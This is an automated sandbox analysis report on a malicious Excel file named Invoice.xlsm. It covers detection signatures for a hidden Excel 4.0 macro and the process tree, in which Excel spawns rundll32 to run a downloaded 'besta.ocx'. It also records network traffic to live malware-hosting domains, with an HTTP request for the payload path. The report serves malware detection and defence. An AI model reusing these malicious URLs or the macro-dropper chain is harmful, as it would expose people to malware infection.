Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice.xlsm

Overview

General Information

Sample Name:Invoice.xlsm
Analysis ID:532378
MD5:41b25400c2b31b922dd090e1251b37b8
SHA1:b543cbb86a4e50506fb9be2ac455e4e606948d65
SHA256:734577b2ffb53ddf37d71db650178c94c017f8749a9f9497d2f76abd876418a6
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6072 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6032, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2997003472, ProcessId: 6072

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Invoice.xlsmVirustotal: Detection: 28%Perma Link
    Source: Invoice.xlsmReversingLabs: Detection: 20%
    Antivirus detection for URL or domainShow sources
    Source: http://crackedshop.org/9/q080U0ARYYL/Avira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 67.207.81.73:443
    Source: global trafficDNS query: name: ascarya.digital
    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 67.207.81.73:443
    Source: global trafficHTTP traffic detected: GET /9/q080U0ARYYL/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: crackedshop.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: crackedshop.orgConnection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: http://crackedshop.org/9/q080U0ARYYL/
    Source: EXCEL.EXE, 00000000.00000003.884335848.0000000012AB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892547749.0000000012AB7000.00000004.00000001.sdmpString found in binary or memory: http://crackedshop.org/cgi-sys/suspendedpage.cgi
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.281578576.0000000012725000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glideso
    Source: EXCEL.EXE, 00000000.00000002.890344949.000000000EEB0000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagrama
    Source: EXCEL.EXE, 00000000.00000002.889287628.000000000D242000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablekH
    Source: EXCEL.EXE, 00000000.00000003.884135611.00000000152B9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285255868.00000000152B9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.893156950.00000000152B9000.00000004.00000001.sdmpString found in binary or memory: http://schemas.o
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionloggingr
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledD
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.o
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerc
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeV/I#H
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://apc.learnin#
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://apc.learnin#o
    Source: EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/addinstemplate9
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15http
    Source: EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officef
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.cortana.ai
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com_U
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comxU
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/Gh
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netbV
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netlV
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.onedrive.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/imports~D
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets6
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.dig
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digit
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital
    Source: EXCEL.EXE, 00000000.00000003.884167113.00000000152DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.893221910.00000000152DD000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/w
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-c
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-con
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-conte
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-
    Source: EXCEL.EXE, 00000000.00000002.892898226.0000000015187000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content/ZH
    Source: EXCEL.EXE, 00000000.00000002.892835370.0000000015161000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content/ZH4rirU/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://augloop.dod.online.of
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://augloop.gov.onlin
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://augloop.office.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comxG
    Source: EXCEL.EXEString found in binary or memory: https://autodiscover-s.o
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885884780.0000000012845000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
